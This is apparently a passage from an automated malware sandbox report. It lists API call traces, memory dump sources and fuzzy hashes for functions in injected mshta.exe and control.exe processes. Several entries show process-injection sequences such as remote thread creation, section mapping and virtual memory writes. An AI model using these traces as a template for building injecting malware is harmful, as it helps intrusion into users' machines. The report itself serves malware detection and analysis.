CloseHandle.KERNEL32(?,?,00000010,?), ref: 049F11B4
HeapFree.KERNEL32(00000000,?,?,00000094,00000000,049F713B,00000000,?,04A0DFBD,00000000,?,04A01BA5,00000000,?,04A03DDF,00000000), ref: 049F14BF
GetLastError.KERNEL32(?,?), ref: 049F1771

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CloseErrorFreeHandleHeapLastmemset
String ID:
API String ID: 2333114656-0
Opcode ID: ae5ee05d88619d6907e73bed9bb04dd866c7b11a344995edf35fea36af93887f
Instruction ID: 4b4f87130386bbbdc70850b0055a03f0b1afcb824e715a837f5188cebb6c17c4
Opcode Fuzzy Hash: ae5ee05d88619d6907e73bed9bb04dd866c7b11a344995edf35fea36af93887f
Instruction Fuzzy Hash: 8941DF75304608FBFF116E60ED42FAB366AAF81714F008531FB09A10D0EA71BD50ABE6

Uniqueness

Uniqueness Score: -1.00%

Function 049F2FC5, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0AA38: lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,049F2FFB,?,?,?,?,?), ref: 04A0AA92
Part of subcall function 04A0AA38: lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,049F2FFB,?,?,?,?,?), ref: 04A0AAB0
Part of subcall function 04A0AA38: RtlAllocateHeap.NTDLL(00000000,74B06985,?), ref: 04A0AADC
Part of subcall function 04A0AA38: memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,049F2FFB,?,?,?,?,?), ref: 04A0AAF3
Part of subcall function 04A0AA38: HeapFree.KERNEL32(00000000,00000000), ref: 04A0AB06
Part of subcall function 04A0AA38: memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,049F2FFB,?,?,?,?,?), ref: 04A0AB15

GetLastError.KERNEL32 ref: 049F3064

Part of subcall function 049FE32E: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00004000,00000001,00000001,?,?,?,?,?,049F304C,?), ref: 049FE3E2
Part of subcall function 049FE32E: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00004000,00000001,00000001,?,?,?,?,?,049F304C,?), ref: 049FE406
Part of subcall function 049FE32E: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,049F304C,?,?,?,?,?,?,?), ref: 049FE411

HeapFree.KERNEL32(00000000,?), ref: 049F3080
HeapFree.KERNEL32(00000000,?), ref: 049F3091
SetLastError.KERNEL32(00000000), ref: 049F3094

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
String ID:
API String ID: 2451549186-0
Opcode ID: fd4ba542a2b307bfc5cca65a72bcadf05d77177e6f3fe24294d29df7e2b34d7c
Instruction ID: 7747349f2570b65efa490ce6b166e8f3dba97cc2a13cd3f20be724672e7a0cbb
Opcode Fuzzy Hash: fd4ba542a2b307bfc5cca65a72bcadf05d77177e6f3fe24294d29df7e2b34d7c
Instruction Fuzzy Hash: 46312A36900208FFDF229F99DC4489EBFB9FF48710B148166FE15A2160C739AA61DF90

Uniqueness

Uniqueness Score: -1.00%

Function 049F433A, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0B21C: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,049F4370,?,?,?,?), ref: 04A0B240
Part of subcall function 04A0B21C: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04A0B252
Part of subcall function 04A0B21C: wcstombs.NTDLL ref: 04A0B260
Part of subcall function 04A0B21C: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,049F4370,?,?,?), ref: 04A0B284
Part of subcall function 04A0B21C: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04A0B299
Part of subcall function 04A0B21C: mbstowcs.NTDLL ref: 04A0B2A6
Part of subcall function 04A0B21C: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,049F4370,?,?,?,?,?), ref: 04A0B2B8
Part of subcall function 04A0B21C: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,049F4370,?,?,?,?,?), ref: 04A0B2D2

GetLastError.KERNEL32 ref: 049F43D9

Part of subcall function 049FE32E: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00004000,00000001,00000001,?,?,?,?,?,049F304C,?), ref: 049FE3E2
Part of subcall function 049FE32E: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00004000,00000001,00000001,?,?,?,?,?,049F304C,?), ref: 049FE406
Part of subcall function 049FE32E: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,049F304C,?,?,?,?,?,?,?), ref: 049FE411

HeapFree.KERNEL32(00000000,?), ref: 049F43F5
HeapFree.KERNEL32(00000000,?), ref: 049F4406
SetLastError.KERNEL32(00000000), ref: 049F4409

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
String ID:
API String ID: 3867366388-0
Opcode ID: 03168d716b98cf9fde81b169a5a12d6f623c0895cb4d1e3a9f0beb74e97088d4
Instruction ID: 6c6af3dd99b69556ca342be04ac1278adea78bd4a869b5ae73c23bc6f850cdac
Opcode Fuzzy Hash: 03168d716b98cf9fde81b169a5a12d6f623c0895cb4d1e3a9f0beb74e97088d4
Instruction Fuzzy Hash: 78314A35900208FFDF029F99DD4089EBFB9FF58320F108166FA25A2160D775AA61DF90

Uniqueness

Uniqueness Score: -1.00%

Function 049FF8F0, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,049F7633,00000000,00000000,00000004,00000000,?,049FCDE0,00000000,?,00000000), ref: 049FF8FC

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

Part of subcall function 04A111FB: StrChrA.SHLWAPI(00000057,0000002F,00000000,00000000,049FF92A,00000000,00000001,00000001,?,?,049F7633,00000000,00000000,00000004,00000000), ref: 04A11209
Part of subcall function 04A111FB: StrChrA.SHLWAPI(00000057,0000003F,?,?,049F7633,00000000,00000000,00000004,00000000,?,049FCDE0,00000000,?,00000000,?,00000057), ref: 04A11213

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,049F7633,00000000,00000000,00000004,00000000,?,049FCDE0,00000000), ref: 049FF95A
lstrcpy.KERNEL32(00000000,00000000), ref: 049FF96A
lstrcpy.KERNEL32(00000000,00000000), ref: 049FF976

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 735284b1cc26b1fbe8f54e1b708e68417aea097cd1ea01d367d81362886835c7
Instruction ID: d86e3cb3bec64d892bf8a60bda3d30b8bdf7bcaeedb50afc27d1aacdeb3e689f
Opcode Fuzzy Hash: 735284b1cc26b1fbe8f54e1b708e68417aea097cd1ea01d367d81362886835c7
Instruction Fuzzy Hash: 76210232500215BBDB129F78CC44AAABFB9EF15388B0580A6FA449B211D630E94187A0

Uniqueness

Uniqueness Score: -1.00%

Function 049FF5BA, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,049F334F,00000000), ref: 049FF5C6
lstrlen.KERNEL32(?), ref: 049FF5CE

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

lstrcpy.KERNEL32(00000000,?), ref: 049FF5E5
lstrcat.KERNEL32(00000000,?), ref: 049FF5F0

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: ed1002d4ad531094c7c7bdde645994a91487b17762d1640eb40b14eea79ff0f2
Instruction ID: 5dbd4eb3a92f5fe3dfaf52a222eebac14429626cf99b0f3da3d5b9eadbd74ad4
Opcode Fuzzy Hash: ed1002d4ad531094c7c7bdde645994a91487b17762d1640eb40b14eea79ff0f2
Instruction Fuzzy Hash: A6E09233804621AB9B129FA4AC08C9FBBE9FF983217044856FA8083120CB35DD168B91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exe PID: 4332 Parent PID: 3388 mshta.exeCOMMON

Executed Functions

Function 0000026865B70FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000003.499524828.0000026865B70000.00000010.00000001.sdmp, Offset: 0000026865B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 8595d93b3aae637a120a074b90e80b6bccf59657db4b5a7b74b80fa6b3fce0e2
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 1990021449584A55D41411914C5925C50846388550FD445814626D4144D94F03962653

Uniqueness

Uniqueness Score: -1.00%

Function 0000026865B70FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000003.499524828.0000026865B70000.00000010.00000001.sdmp, Offset: 0000026865B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 8595d93b3aae637a120a074b90e80b6bccf59657db4b5a7b74b80fa6b3fce0e2
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 1990021449584A55D41411914C5925C50846388550FD445814626D4144D94F03962653

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: control.exe PID: 6348 Parent PID: 6660 control.exeCOMMON

Executed Functions

Function 00CA9358, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 648memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00CA9400

Strings

@, xrefs: 00CA9837

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: AllocateHeap
String ID: @
API String ID: 1279760036-2766056989
Opcode ID: 8d6ae79d260867ce2ab6d4829a20b54fd94871369f09479f8fe001baff37a5e6
Instruction ID: c61a3ec235f602398be92544ad39226ed715dc49ff1af629cc052a5b2243cb8a
Opcode Fuzzy Hash: 8d6ae79d260867ce2ab6d4829a20b54fd94871369f09479f8fe001baff37a5e6
Instruction Fuzzy Hash: B3129330718F0A8FDB59EF29D8866A673E1FB99304F44462DE45AC3255DF34EA41CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00C9717C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationToken.NTDLL ref: 00C97230
NtQueryInformationToken.NTDLL ref: 00C97278
NtClose.NTDLL ref: 00C972B0

Strings

0, xrefs: 00C971DB

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: InformationQueryToken$Close
String ID: 0
API String ID: 459398573-4108050209
Opcode ID: f34cb5f96a8fa0191b1ea23d32f9f7856d4de51cb850de6b78dccf904c9b699f
Instruction ID: 315af47c2b0cdc627de59f4f1fecf98a3d804753f8f477532cca32fc888a5b78
Opcode Fuzzy Hash: f34cb5f96a8fa0191b1ea23d32f9f7856d4de51cb850de6b78dccf904c9b699f
Instruction Fuzzy Hash: 3D310B30218B488FDB64EF59D8C8B9AB7E6FBD8301F54492DE58EC3250DB349946CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00CB4D5C, Relevance: 6.2, APIs: 4, Instructions: 187nativethreadinjectionCOMMON

Download Yara Rule

APIs

NtSetInformationProcess.NTDLL ref: 00CB4E04
CreateRemoteThread.KERNELBASE ref: 00CB4EAA
FindCloseChangeNotification.KERNELBASE ref: 00CB4EFC

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: ChangeCloseCreateFindInformationNotificationProcessRemoteThread
String ID:
API String ID: 1964589409-0
Opcode ID: fedf824bf889bb29875a726a9306ffc3c91e6404ec0e103ff47e142783c1fb90
Instruction ID: 761097b5c82f90bd3ef7d564c54ec48c8843b3caa94db2f5239a754b94a49be8
Opcode Fuzzy Hash: fedf824bf889bb29875a726a9306ffc3c91e6404ec0e103ff47e142783c1fb90
Instruction Fuzzy Hash: D351823161CB458FD758EF69D8996BAB7E5FB98301F00442DE94AC3262EE34DD05CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C91008, Relevance: 4.8, APIs: 3, Instructions: 303memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 00C91061
VirtualAlloc.KERNELBASE ref: 00C91174
VirtualFree.KERNELBASE ref: 00C91261

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: Virtual$AllocCreateFreeHeap
String ID:
API String ID: 2341667014-0
Opcode ID: d371b6627161ee4ac3a09d75bd18f4978878a1fe4e500bc8b13c435291804fc4
Instruction ID: 2302762c6c03270391d9165e0e964d4b19e7d937e828ee6ffa6c9782adb8548f
Opcode Fuzzy Hash: d371b6627161ee4ac3a09d75bd18f4978878a1fe4e500bc8b13c435291804fc4
Instruction Fuzzy Hash: FD91D730608B098FEB69EF28D84A76A77E5FB98311F14453DE99BC3251EF34D9428741

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7960, Relevance: 4.2, APIs: 2, Instructions: 1221synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexExA.KERNEL32 ref: 00CA7A26
GetUserNameA.ADVAPI32 ref: 00CA7C4C

Part of subcall function 00C95FA8: CreateThread.KERNELBASE ref: 00C95FD8
Part of subcall function 00C95FA8: QueueUserAPC.KERNELBASE(?,?,?,?,?,?,?,?,0000007E,00000002,?,00CA7EF9), ref: 00C95FEF

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: CreateUser$MutexNameQueueThread
String ID:
API String ID: 2503873790-0
Opcode ID: a51f97041174acbca8c98c7dd7ad9dcdb10a07418b5ffb6d17f4e90e82215122
Instruction ID: cde71a4cd9da49a3ecbd19a02b411f5582f20981dbcafdf43d8975eb7b603ce6
Opcode Fuzzy Hash: a51f97041174acbca8c98c7dd7ad9dcdb10a07418b5ffb6d17f4e90e82215122
Instruction Fuzzy Hash: 4F82F871618A08CFEB18EF28EC856EA33E1F799704B10852ED457C3161DF38DA46CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00CB6494, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL ref: 00CB6636

Part of subcall function 00CB178C: NtMapViewOfSection.NTDLL ref: 00CB17D8

Strings

0, xrefs: 00CB662A

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: Section$CreateView
String ID: 0
API String ID: 1585966358-4108050209
Opcode ID: 9fc77ca072fe689ce618b2aeb3060a384f7254f56b93281f05954ff54438c546
Instruction ID: c76abf9eb70317f22ffebc36a920e5206aeb55a7a2f0aa5f8007a590e776cc3b
Opcode Fuzzy Hash: 9fc77ca072fe689ce618b2aeb3060a384f7254f56b93281f05954ff54438c546
Instruction Fuzzy Hash: 2761E47061CF098FDB54EF69D889AA5B7E1FB98301F10456EE84EC7261DB34E941CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C95384, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 00C953C1

Strings

@, xrefs: 00C953A5

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: e4fae4c46d93450b1f5f44af48928ede4d90f3d2223d96c8ac587fac314979d8
Instruction ID: d28e21e5075b4114062cb1ba14d09292c52024f14cd56df87e938a84a97496b1
Opcode Fuzzy Hash: e4fae4c46d93450b1f5f44af48928ede4d90f3d2223d96c8ac587fac314979d8
Instruction Fuzzy Hash: A0F090B4619A088BDF44DFA9D8CC529BBE0F75C345F60096DE11AC7294DBB88A498742

Uniqueness

Uniqueness Score: -1.00%

Function 00CCA02A, Relevance: 3.3, APIs: 2, Instructions: 321nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 00CCA27A
NtProtectVirtualMemory.NTDLL ref: 00CCA309

Memory Dump Source

Source File: 00000026.00000002.559888266.0000000000CCA000.00000040.00000001.sdmp, Offset: 00CCA000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 15faed90258188bca32e6bbcd83842d191fe2b1793540def6796956299523fd1
Instruction ID: ba55bcb83b022126f757f5b4236274e696d34cec9cbf309a72908534782797f5
Opcode Fuzzy Hash: 15faed90258188bca32e6bbcd83842d191fe2b1793540def6796956299523fd1
Instruction Fuzzy Hash: E3A1D43121CB888FC728DF28D885BA9B3E1FB95314F58496ED4DFC7252D634E5468782

Uniqueness

Uniqueness Score: -1.00%

Function 00CB59AC, Relevance: 1.7, APIs: 1, Instructions: 183nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 00CB5A21

Part of subcall function 00C98820: NtReadVirtualMemory.NTDLL ref: 00C9883F

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: InformationMemoryProcessQueryReadVirtual
String ID:
API String ID: 1498878907-0
Opcode ID: 4ef935d9c0703a7a636d86a422df09e5c75491d2e0595eb5fa0fb3603f9b2cb1
Instruction ID: 935610ae322a6d4af64d25326c4737821d226941486d5aad4d9b779c535806f4
Opcode Fuzzy Hash: 4ef935d9c0703a7a636d86a422df09e5c75491d2e0595eb5fa0fb3603f9b2cb1
Instruction Fuzzy Hash: A6519330218F488BDB29EF28D8857E6B3E5FBD9341F44452EA84EC7285DE34DA45C786

Uniqueness

Uniqueness Score: -1.00%

Function 00CA8D8C, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 00CA8DB2

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 020b567f3761d91e8fd50241ce594948fe39df34da5b734a6c3a5c8a79c4055c
Instruction ID: f5e1e56f62f96d2a045e0d4cc265e91194a1579ff70c28f46e353535deba58c0
Opcode Fuzzy Hash: 020b567f3761d91e8fd50241ce594948fe39df34da5b734a6c3a5c8a79c4055c
Instruction Fuzzy Hash: 03018130718E0E8F9B84EF69E8D4A7673F0FBA9309B54416EE40AC7160DB34D985CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00CB178C, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 00CB17D8

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction ID: 80d3d51668ea6a4901aa776af6ee15c400e09908b889ea329f5b62e96d027ad0
Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction Fuzzy Hash: 3801D2B0A08B048FCB48EF69D0C8569BBE1FB58311F50066FE949CB796EB70D885CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00C98820, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 00C9883F

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: 795faa593ae17a69c7e2351d8cbbeb4203cf6446539513d5b0013047378a185d
Instruction ID: 9b411f654917fa0ee90933e8128aa0edb1dfe95c81da8f59829a662cdbb31be1
Opcode Fuzzy Hash: 795faa593ae17a69c7e2351d8cbbeb4203cf6446539513d5b0013047378a185d
Instruction Fuzzy Hash: 71E0DF34B22A404FEF00ABB988CC23933D1F78C306F600839E845C33A0CE79C8898712

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1E6C, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 00CA1E8B

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 0990d87f2bc96046494df155b67368667061e4c79741bb5018e7ecb12654a5e8
Instruction ID: 8fbd389592666d29694c7c7a14b852fcc000feedfc1f40641dde82b5d913b7dc
Opcode Fuzzy Hash: 0990d87f2bc96046494df155b67368667061e4c79741bb5018e7ecb12654a5e8
Instruction Fuzzy Hash: 8BE0DF30B24A498BEB086BF488CC27977E1F78930AF144939ED51C7320DB28C9448382

Uniqueness

Uniqueness Score: -1.00%

Function 00C9A4D0, Relevance: 6.2, APIs: 4, Instructions: 234threadinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB5ECC: FindCloseChangeNotification.KERNELBASE ref: 00CB5F78

VirtualProtectEx.KERNELBASE ref: 00C9A5D7
ResumeThread.KERNELBASE ref: 00C9A614
SuspendThread.KERNELBASE ref: 00C9A637

Part of subcall function 00CA9358: RtlAllocateHeap.NTDLL ref: 00CA9400

VirtualProtectEx.KERNELBASE ref: 00C9A6B4

Part of subcall function 00CB5F94: VirtualProtectEx.KERNELBASE ref: 00CB5FE8

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: ProtectVirtual$Thread$AllocateChangeCloseFindHeapNotificationResumeSuspend
String ID:
API String ID: 1287749370-0
Opcode ID: 9f127d15bb87f4f2efebda3394759f6b11b71be3a688c8bfbab5682a158dc68e
Instruction ID: ecd535fc2ee8ae78560dc890d3a63e5902c75693ffb31c596a72b734da08e8cb
Opcode Fuzzy Hash: 9f127d15bb87f4f2efebda3394759f6b11b71be3a688c8bfbab5682a158dc68e
Instruction Fuzzy Hash: 7561A130718F088FDB68EB58D8497AAB3D1FB88315F10452DE59FC3151DE34D9468B86

Uniqueness

Uniqueness Score: -1.00%

Function 00CADC14, Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE ref: 00CADCE8
SetFilePointer.KERNELBASE ref: 00CADD02
ReadFile.KERNELBASE ref: 00CADD24
FindCloseChangeNotification.KERNELBASE ref: 00CADD3F

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerRead
String ID:
API String ID: 2405668454-0
Opcode ID: 9422297eccfc293eb30b268fd39847538c7b5cb23406a6093c1ca6e48b10e891
Instruction ID: 6033f8359f5c26ec594ef43d48437503159178b2567882b1cb5d8fb2ee194303
Opcode Fuzzy Hash: 9422297eccfc293eb30b268fd39847538c7b5cb23406a6093c1ca6e48b10e891
Instruction Fuzzy Hash: 02410830618A094FDB58DF28D8C4A2573E1F799319F244A6DE09BC7665DF34D943CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C96DD4, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C96AC8: RegCreateKeyA.ADVAPI32 ref: 00C96AEB

RegQueryValueExA.KERNELBASE ref: 00C96E3D

Strings

(, xrefs: 00C96E49
(, xrefs: 00C96E8C

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: CreateQueryValue
String ID: ($(
API String ID: 2711935003-222463766
Opcode ID: e2301f09982cb3e06fa545f894a738d65b20e9454e5a47874bbdcac8da203600
Instruction ID: 86c5aa51621306fd39bc64c0d357d6856317d186c687b3378318490be4611e2a
Opcode Fuzzy Hash: e2301f09982cb3e06fa545f894a738d65b20e9454e5a47874bbdcac8da203600
Instruction Fuzzy Hash: 5141A3351147498FFB28DF18E889A6A73E5F798305F20452DD88AC32A0DF78DA4BCB41

Uniqueness

Uniqueness Score: -1.00%

Function 00CBB1BC, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 00CBB2F9

Strings

H, xrefs: 00CBB1E0

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: H
API String ID: 1029625771-2852464175
Opcode ID: b5a289b5d4c992499dc3dac70e4ffc0962864324823412197d1430f92fcc21da
Instruction ID: 1e3471f86cf5cb08a8c21cf58746d7bddc251aca26cafaa95686200dcc2b1a18
Opcode Fuzzy Hash: b5a289b5d4c992499dc3dac70e4ffc0962864324823412197d1430f92fcc21da
Instruction Fuzzy Hash: A1A18530508F0A8FDB55DF58D8886B6B7E1FBA8305F04466ED88AC7161EF74D945CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00CA0810, Relevance: 3.2, APIs: 2, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C960B4: VirtualProtect.KERNELBASE ref: 00C960E7

VirtualProtect.KERNELBASE ref: 00CA0931
VirtualProtect.KERNELBASE ref: 00CA0954

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 518426284d61d15d3502709a9d92cd859291f21b42433b42c28555311c0463c6
Instruction ID: f60fe6d4b292678af0ab8e49752bc0c241ca99003fee8f1e3b181badfe7cee46
Opcode Fuzzy Hash: 518426284d61d15d3502709a9d92cd859291f21b42433b42c28555311c0463c6
Instruction Fuzzy Hash: 77519070618F098FEB44EF29D889666B7E0FB58305F24416EE44EC3266DB34E941CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5FC4, Relevance: 3.2, APIs: 2, Instructions: 152COMMON

Download Yara Rule

APIs

StrRChrA.KERNELBASE ref: 00CA6037
RtlAddVectoredContinueHandler.NTDLL ref: 00CA612B

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: ContinueHandlerVectored
String ID:
API String ID: 3758255415-0
Opcode ID: f51fcd08110e18c9a62b7bab316d92ca45731ceeeb4a4fc1b42251246c0126b0
Instruction ID: 1215936d2e7d5c977babc05b4e8995c966f9e964423c5e946942c14a7bee57f9
Opcode Fuzzy Hash: f51fcd08110e18c9a62b7bab316d92ca45731ceeeb4a4fc1b42251246c0126b0
Instruction Fuzzy Hash: D141D73061CA0A8FE755EF38D8886AA77E2FB99309F45862F945BC3261DF38C645C741

Uniqueness

Uniqueness Score: -1.00%

Function 00C9C054, Relevance: 3.1, APIs: 2, Instructions: 106registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,00027A34,00C947A6), ref: 00C9C0AE
RegCloseKey.KERNELBASE ref: 00C9C127

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: CloseOpen
String ID:
API String ID: 47109696-0
Opcode ID: 238fac6302308b16575721b08c53e89d9e264f0dd4f5d1bc62645508f27ee200
Instruction ID: 40ba85cce5baa62a92cc8ff81ef6e1b6b58a1811f496271e1dcea7e9abffcfe9
Opcode Fuzzy Hash: 238fac6302308b16575721b08c53e89d9e264f0dd4f5d1bc62645508f27ee200
Instruction Fuzzy Hash: 88316471618B088FDB64EF28D8C855AB7E1F798304B514A6EE45EC3251DF34D945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00CAE38C, Relevance: 3.1, APIs: 2, Instructions: 101registryCOMMON

Download Yara Rule

APIs

